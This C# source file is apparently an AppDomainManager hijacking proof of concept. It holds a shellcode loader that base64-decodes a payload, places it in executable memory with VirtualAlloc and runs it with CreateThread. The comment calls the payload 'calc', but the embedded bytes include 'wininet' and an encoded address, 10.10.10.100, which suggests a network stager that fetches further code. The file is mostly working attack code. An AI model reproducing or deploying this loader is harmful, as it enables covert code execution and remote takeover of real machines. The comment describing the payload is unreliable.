using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;


public sealed class MyAppDomainManager : AppDomainManager
{
  
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
		System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");
		// You have more control here than I am demonstrating. For example, you can set ApplicationBase, 
		// Or you can Override the Assembly Resolver, etc...
		// If you want, execute shellcode or whatever.
		//bool res = ClassExample.Execute();
		
        return;
    }
}

public class ClassExample 
{         
	//private static UInt32 MEM_COMMIT = 0x1000;          
	//private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
	
	[DllImport("kernel32")]
	private static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
	
	[DllImport("kernel32")]
	private static extern IntPtr CreateThread(            
	UInt32 lpThreadAttributes,
	UInt32 dwStackSize,
	IntPtr lpStartAddress,
	IntPtr param,
	UInt32 dwCreationFlags,
	ref UInt32 lpThreadId           
	);
	[DllImport("kernel32")]
	private static extern UInt32 WaitForSingleObject(           
	IntPtr hHandle,
	UInt32 dwMilliseconds
	);          
	public static bool Execute()
	{
	  // Its calc, I think ;-)
	  byte[] installercode = System.Convert.FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxMC4xMC4xMC4xMDAAWkiJwUnHwPsgAABNMclTU2oDU0m6V4mfxgAAAAD/1ehHAAAAL3pqckU2QVh2TFh0cUUyc1JORUlLeXd0a3EtSGoyYjhRYVNSNTJCUlVNcjd6VHo2R0ZiX3Q2dTIyU1MyWGp3ZmlaY2RWYgBIicFTWkFYTTHJU0i4ADKghAAAAABQU1NJx8LrVS47/9VIicZqCl9IifFqH1pSaIAzAABJieBqBEFZSbp1Rp6GAAAAAP/VTTHAU1pIifFNMclNMclTU0nHwi0GGHv/1YXAdR9Ix8GIEwAASbpE8DXgAAAAAP/VSP/PdALrquhVAAAAU1lqQFpJidHB4hBJx8AAEAAASbpYpFPlAAAAAP/VSJNTU0iJ50iJ8UiJ2knHwAAgAABJiflJuhKWieIAAAAA/9VIg8QghcB0smaLB0gBw4XAddJYw1hqAFlJx8LwtaJW/9U=");
	  
	  IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40);
	  Marshal.Copy(installercode, 0, (IntPtr)(funcAddr), installercode.Length);
	  IntPtr hThread = IntPtr.Zero;
	  UInt32 threadId = 0;
	  IntPtr pinfo = IntPtr.Zero;
	  hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
	  WaitForSingleObject(hThread, 0xFFFFFFFF);
	  return true;
	} 
}